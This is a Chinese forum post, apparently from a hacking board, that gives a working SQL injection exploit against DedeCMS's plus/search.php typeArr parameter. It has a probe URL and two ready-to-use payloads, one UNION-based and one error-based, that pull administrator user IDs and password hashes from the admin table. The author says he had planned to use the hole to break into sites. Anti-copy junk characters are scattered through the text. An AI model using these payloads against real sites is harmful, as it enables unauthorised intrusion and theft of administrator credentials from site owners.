转载不加作者名的没JJ! O: X% l P& A6 [% m* P7 P
; f& Z" h5 N* j2 l1 K哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
2 E L( _0 d$ k9 a6 {
# \, g3 l* ]; l6 v7 c/ W既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
' n5 S F9 b1 Q0 T0 N4 a
% f0 z" z4 y6 h0 {- N0 \5 B. e我一般是这样测试的:+ v" E# F. Q4 r$ B: m8 J
) x8 M+ C. {. K. }
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
! T- }9 c6 d& u4 d' e! O5 |% n% C3 k0 l. k1 o( a7 ~2 v" ~6 d
转载不加作者名的没JJ# b F: n& y3 I' J
; }, l, |+ _3 K7 q3 S3 e" C作者:鬼哥6 d7 P' y, ]3 S! G. l; }+ ^' g# ?/ x
2 W# L# [ N% }0 y" x0 }) y 6 E) j0 L- L5 \. c9 M
( f$ C/ H3 E3 E1 ?! K+ T/ d4 ]" [看结果如果提示& N0 @% b, E h1 q" s" J8 \
/ @; q2 r6 p8 HSafe Alert: Request Error step 2 !( X3 V5 k* v0 m6 k
1 K$ ^; j# ]3 C7 R
那么直接用下面的exp& s! B! I& H1 A4 p3 }/ q
7 Z' s" m9 L$ Y: C c0 _! u; B2 m D
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a5 |+ [7 d2 `: a5 X
! e. Q% k% P5 I. D. m! A
: S6 G9 z5 r; i1 [! |6 G( m4 }看结果如果提示1 M' [2 O5 W7 U1 p" h9 y
% w; o! n4 r. {/ ^8 D( T: i
Safe Alert: Request Error step 1 !
& e4 l; R, L9 l- l0 ]% B/ U2 G/ f( `7 S2 _$ ?3 ^
那么直接用下面的exp
6 q: e1 E" L" ^) y1 M5 z! S( B& O
( P, N8 ^3 I" H7 W7 Txx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
. n8 U5 t) `# Y1 s
) N& o3 R, V7 v3 [
7 U' n% v! c2 o如果正常显示证明漏洞不存在了。& ^6 o Y7 T0 W! i5 }8 p
# K- S/ ^) L/ D1 q- F5 \; ~转载不加作者名的没JJ |